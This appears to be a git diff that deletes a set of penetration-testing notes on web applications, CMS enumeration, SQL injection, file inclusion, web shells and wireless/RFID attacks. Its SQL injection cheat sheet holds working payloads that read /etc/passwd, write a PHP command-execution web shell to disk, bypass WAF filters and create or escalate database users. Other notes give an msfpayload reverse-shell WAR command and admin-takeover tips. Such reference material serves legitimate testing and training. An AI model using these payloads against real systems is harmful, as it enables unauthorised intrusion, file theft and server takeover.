cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./ -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba

+ 0
- 67
Draft/Draft/Draft/Web Applications/Cull integrate.txt View File

@ -1,67 +0,0 @@
[Go Buster](
* Directory/file busting tool written in Go
* Recursive, CLI-based, no java runtime
[Relative Path Overwrite Explanation/Writeup](
* RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
* Probe LAN devices from a web browser.
* Recovers the master password of key3.db files, i.e. Thunderbird, Firefox
[Javascript De-Obfuscation Tools Redux](
* Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
Intro to Content Security Policy
Securing Web Application Technologies Checklist
Client Identification Mechanisms
RAWR - Rapid Assessment of Web Resources
COWL: A Confinement System for the Web
robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
List of modules in Co2:
Help page:
A collection of enhancements for Portswigger's popuplar Burp Suite web penetration testing tool.
Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
OWASP Mantra
“OWASP Mantra is a powerful set of tools to make the attacker's task easier”
Burp Suite extension to generate Intruder payloads using Radamsa

+ 0
- 54
Draft/Draft/Draft/Web Applications/Drupal.txt View File

@ -1,54 +0,0 @@
Check changelog file, sometimes they add things in/shows current version
Gain Admin Access Drupal - has to have drush installed
“cd [drupal dir]”
“drush uli”
Copy/Paste URL, change password, bam! Admin.
Watchdog - built in logging
Syslog - Linux sys logging
User Enumeration:
No brute force protection on Version 6
Abuse Password reset feature, tells you valid user creds.
Version 7 has brute force protection
Check Default
Less Noisy:
Check posts authors
Drupal 6 doesn’t use httponly flag
Files to look for:
mysite/sites/default/settings.php - Creds
Check to see:
Masquerade plugin present - allows you to change user to any user.
Devel Plugin present - Shows db info on ever page; allows for php code execution
Drupal Attack Scripts:
Set of brute force scripts and Checklist
Drupal Security Checklist

+ 0
- 22
Draft/Draft/Draft/Web Applications/General Tips Trick.txt View File

@ -1,22 +0,0 @@
Fix up
Generating payload for Tomcat
msfpayload java/shell/reverse_tcp LHOST= W > colesec.war
Tomcat does not have default creds however, when packaged up, it generally has creds similar across distributions.
Use auxiliary/scanner/http/tomcat_mgr_login
Code Injection:
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
allowed characters (standard regular expressions classes or custom)
data format
amount of expected data
Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
; ls

+ 0
- 14
Draft/Draft/Draft/Web Applications/HTML5.txt View File

@ -1,14 +0,0 @@
The Securing HTML5 Assessment Resource Kit, or SH5ARK, is an open source project that provides a repository of HTML5 features, proof-of-concept attack code, and filtering rules. The purpose of this project is to provide a single repository that can be used to collect sample code of vulnerable HTML5 features, actual attack code, and filtering rules to help prevent attacks and abuse of these features. The intent of the project is to bring awareness to the opportunities that HTML5 is providing for attackers, to help identify these attacks, and provide measures for preventing them
Presentation on SH5ARK
GetSH5ARK here:

+ 0
- 40
Draft/Draft/Draft/Web Applications/Joomla.txt View File

@ -1,40 +0,0 @@
Joomscan - hasn’t been updated since 2012, still nice.
Application Level Logging
Flat file logging - Jlog
Files to look for:
mysite/configuration.php - Config file
User Enumeration:
Abuse Password reset feature, tells you valid user creds.
Can be brute forced through scripting, but slow
Less Noisy:
Check posts authors
Check user #s

+ 0
- 30
Draft/Draft/Draft/Web Applications/LFI RFI Local File Inclusion.txt View File

@ -1,30 +0,0 @@
LFI Local File Inclusion Techniques (paper)
This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
Update: a third (known) technique has been dissected here:
Liffy (tool)
Liffy is a Local File Inclusion Exploitation tool.
Current features include:
data:// for code execution
expect:// for code execution
input:// for code execution
filter:// for arbitrary file reads
/proc/self/environ for code execution in CGI mode
Apache access.log poisoning
Linux auth.log SSH poisoning
Direct payload delivery with no stager
Support for absolute and relative paths
Support for cookies
! I have had issues with access log poisoning on current versions of Apache. This not an issue with the payload delivery and or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh. !

+ 0
- 0
Draft/Draft/Draft/Web Applications/Meta.rtf View File

+ 0
- 43
Draft/Draft/Draft/Web Applications/NO SQL Injection.txt View File

@ -1,43 +0,0 @@
NO/SQL Injection
SQL Injection Cheat Sheet
SQL Injection Knowledge Base
Taken from:
“Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.”
Pen Testing MongoDB
SQLi Lab lessons
SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:
Error Based Injections (Union Select)
Error Based Injections (Double Injection Based)
BLIND Injections: 1.Boolian Based 2.Time Based
Update Query Injection.
Insert Query Injections.
Header Injections. 1.Referer based. 2.UserAgent based. 3.Cookie based.
Second Order Injections
Bypassing WAF
Bypassing Blacklist filters Stripping comments Stripping OR & AND Stripping SPACES and COMMENTS Stripping UNION & SELECT
Impidence mismatch
Bypass addslashes()
Bypassing mysql_real_escape_string. (under special conditions)
Stacked SQL injections.
Secondary channel extraction

+ 0
- 1
Draft/Draft/Draft/Web Applications/SQLMap Cheat Sheet.txt View File

@ -1 +0,0 @@

+ 0
- 39
Draft/Draft/Draft/Web Applications/Securing Web Applications.txt View File

@ -1,39 +0,0 @@
Securing Web Applications
Center for Internet Security Apache Server 2.4 Hardening Guide:
Magical Code Injection Rainbow Framework
The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds.
Has testing lessons for xss/csrf/sql
Source Code Analysis
RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.

+ 0
- 28
Draft/Draft/Draft/Web Applications/Tools/Brute Force Tools.txt View File

@ -1,28 +0,0 @@
Brute Force Tools
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.
It's very flexible, here are some functionalities:
Multiple Injection points capability with multiple dictionaries
Recursion (When doing directory bruteforce)
Post, headers and authentication data brute forcing
Output to HTML
Colored output
Hide results by return code, word numbers, line numbers, regex.
Cookies fuzzing
Multi threading
Proxy support
SOCK support
Time delays between requests
Authentication support (NTLM, Basic)
All parameters bruteforcing (POST and GET)
Multiple encoders per payload
Payload combinations with iterators
Baseline request (to filter results against)
Brute force HTTP methods
Multiple proxy support (each request through a different proxy)
HEAD scan (faster for resource discovery)

+ 0
- 6
Draft/Draft/Draft/Web Applications/Tools/JS PHP Decoders Unobfuscators.txt View File

@ -1,6 +0,0 @@ php decoder

+ 0
- 13
Draft/Draft/Draft/Web Applications/Tools/Meta.txt View File

@ -1,13 +0,0 @@
OWASP Mantra
“OWASP Mantra is a powerful set of tools to make the attacker's task easier”

+ 0
- 0
Draft/Draft/Draft/Web Applications/Tools/SQL Injection.rtf View File

+ 0
- 21
Draft/Draft/Draft/Web Applications/Tools/Scanners.txt View File

@ -1,21 +0,0 @@
Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS.
CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.
Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
CMS Explorer can also search OSVDB for vulnerabilities with the installed components.
CMS Explorer currently supports module/theme discovery with the following products:
And exploration of the following products:

+ 0
- 0
Draft/Draft/Draft/Web Applications/Tools/Tools.rtf View File

+ 0
- 22
Draft/Draft/Draft/Web Applications/Tools/WebShells.txt View File

@ -1,22 +0,0 @@
B374k Shell
File manager (view, edit, rename, delete, upload, download, archiver, etc)
Search file, file content, folder (also using regex)
Command execution
Script execution (php, perl, python, ruby, java, node.js, c)
Give you shell via bind/reverse shell connect
Simple packet crafter
Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
SQL Explorer
Process list/Task manager
Send mail with attachment (you can attach local file on server)
String conversion
All of that only in 1 file, no installation needed
Support PHP > 4.3.3 and PHP 5

+ 0
- 0
Draft/Draft/Draft/Web Applications/Web Applications.rtf View File

+ 0
- 32
Draft/Draft/Draft/Web Applications/Wordpress.txt View File

@ -1,32 +0,0 @@
WPScan - Awesomesauce. Updated.
App level loggging
WP Security Audit log - Plugin
Files to look for:
mysite/wp-config.php - Creds infile
User Enumeration:
Abuse Password reset feature, tells you valid user creds.
Can be brute forced
Less Noisy:
Check posts authors

+ 0
- 111
Draft/Draft/Draft/Web Applications/sqli cheat.txt View File

@ -1,111 +0,0 @@
CheatSheet: SQL Injection
/* – Multi line comment.
# – single line comment.
-- – single line comment.
/*!*/ – Mysql special comments.
+, %2B, %20, %09, %0d ,%0?, /**/, /*foo*/
Global system variables
@@datadir // Mysql data directory.
@@version_compile_os - //OS Mysql is running on.
@@version – //Mysql database version.
user() – //Current database user.
@@log_error – //Path to error log.
database() – //Current database.
The INFORMATION_SCHEMA database is made up of the following objects:
Columns in a SELECT.
file.php?var=1 order by 10-- //Unknown column ’10' in ‘order clause’
file.php?var=1 and(select * from table)=(1)-- //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as latin1)-- //5.0.11
file.php?var=1 union select convert(version() as binary)-- //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
file.php?var=1 union select unhex(hex(versions()))-- //5.0.11
file.php?var=1 union select user()-- //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user=’root’-- //Checking for the file priveledge on current user, Y =Yes N=No.
file.php?var=1 union select load_file(‘/etc/passwd’)-- // Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)-- // Loading system files with error based injection.
file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’-- // Write code to a file.
file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”--+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*select*/ version()-- //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass
file.php?var=1/**/union/**/select/**/version()-- //Whitespace bypass
file.php?var=1 UnION SElecT version()-- //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()-- //php comments.
file.php?var=1 uni%6Fn select version()-- //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0×414141414141414141414141414141414141 union select version()-- //Buffer overflow.
file.php?var=1 union select 0x3a3a3a-- //Encode to bypass magic quotes.
Extracting data from MySQL errors.
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --
Name_const(Mysql 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--
Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--
Injecting into an order byfile.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW())))-- //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3))-- //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))--
If Statement SQL Injection Attack Samples
SELECT IF(user()='root@localhost','true','false')
Load File
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
Create User
CREATE USER username IDENTIFIED BY 'password'; --
Drop User
DROP USER username; --
Make user to DBA
GRANT ALL PRIVILEGES ON *.* TO username@'%';
List Users
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user
Getting user defined tables SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
Getting Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’tblUsers -> tablename
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
find table which have a column called 'username'
String without Quotes
This will return ‘KLM’.

+ 0
- 165
Draft/Draft/Draft/Wireless View File

@ -1,165 +0,0 @@
Wireless Networks
Bluetooth NSA toolset talk/attacks vid
[WPA/WPA2 Dictionaries](
* This is the tool created to automate Evil Twin attack and capturing public and guest credentials of Access Point
[SS7: Locate. Track. Manipulate. You have a tracking device in your pocket](
* Companies are now selling the ability to track your phone number whereever you go. With a precision of up to 50 meters, detailed movement profiles can be compiled by somebody from the other side of the world without you ever knowing about it. But that is just the tip of the iceberg.
Fox Hunting & Wardriving
[Practical Foxhunting 101](
Wireless Reconnaissance
Description: iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks.
iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks, as described in [1]. iSniff GPS captures these ARPs and submits MAC addresses to Apple's WiFi location service (masquerading as an iOS device) to obtain GPS coordinates for a given BSSID. If only SSID probes have been captured for a particular device, iSniff GPS can query network names on and visualise possible locations.
Guide to setting up/doing wifi attacks
this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WEP protected test network. For just $16
Piece to purchase:
RFID - Radio Frequency Identification
Hardware and software to run a RFID reader to harvest card information. This is the PCB design and Arduino code that will run a RFID reader, allowing you to gather and harvest cards. Typically, a larger reader, such as those in garages, will be more successful, allowing you to ready over a couple feet instead of inches. The board itself is designed to be modular and support multiple methods to output harvested cards once they are read:
Text file on a MicroSD card
Print out to LCD
Bluetooth Low Energy Arduino serial connection
Each of these options are supported in code, but can be ignored on the PCB. The PCB itself has been designed to use a pluggable module for each of these options, making it easy to ignore, install, or change out which ones you find useful.
Zigbee Wireless Networks